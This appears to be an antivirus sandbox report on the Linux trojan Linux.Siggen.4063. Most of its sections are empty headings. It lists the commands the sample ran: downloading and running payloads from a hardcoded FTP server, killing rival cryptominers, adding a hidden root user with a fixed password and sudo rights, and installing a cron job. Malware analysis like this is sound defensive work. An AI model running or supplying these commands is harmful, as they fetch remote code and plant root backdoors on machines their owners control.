Linux.Siggen.4063

To ensure autorun and distribution:

Creates or modifies the following files:

Malicious functions:

Launches processes:

/bin/bash <SAMPLE_FULL_PATH> -c exec '<SAMPLE_FULL_PATH>' \"$@\" <SAMPLE_FULL_PATH>
<SAMPLE_FULL_PATH>
/bin/bash <SAMPLE_FULL_PATH> -c
rm -rf .retea
chmod +x .teaca
./.teaca
mkdir /tmp/.tmp
rm -rf xmrig
rm -rf .black xmrig.1
pkill cnrig
pkill java
pkill xmrig
wget -q ftp://136.144.41.41/.black
chmod 777 .black
./.black
/bin/bash ./.black -c exec './.black' \"$@\" ./.black
/bin/bash ./.black -c
mkdir /var/tmp/.ladyg0g0/
id -u
sleep 0.5
cat /var/tmp/.ladyg0g0/.pr1nc35
wget -q ftp://136.144.41.41/Opera --no-check-certificate
ls
chmod 777 Opera
cat /etc/passwd
grep -q node
/usr/sbin/useradd -u0 -g0 -o -s /bin/bash node
nscd -i passwd
nscd -i group
usermod -aG sudo node
yes pulamea321!
passwd node
grep -q .black
crontab -l
rm -rf /tmp/.tmp/.5p4rk3l5
sleep 1
crontab /tmp/.tmp/.5p4rk3l5
chmod 777 /tmp/.tmp/.b4nd1d0
/tmp/.tmp/./.b4nd1d0
pgrep -x Opera

Attempts to kill the following processes:

Performs operations with the file system:

Modifies file access rights:

Creates folders:

Creates symlinks:

Creates or modifies files:

Deletes files:

Network activity:

Establishes connection:

Connects to the following servers over the IRC protocol:

Receives data from the following servers:

Other:

Collects CPU information

Collects RAM information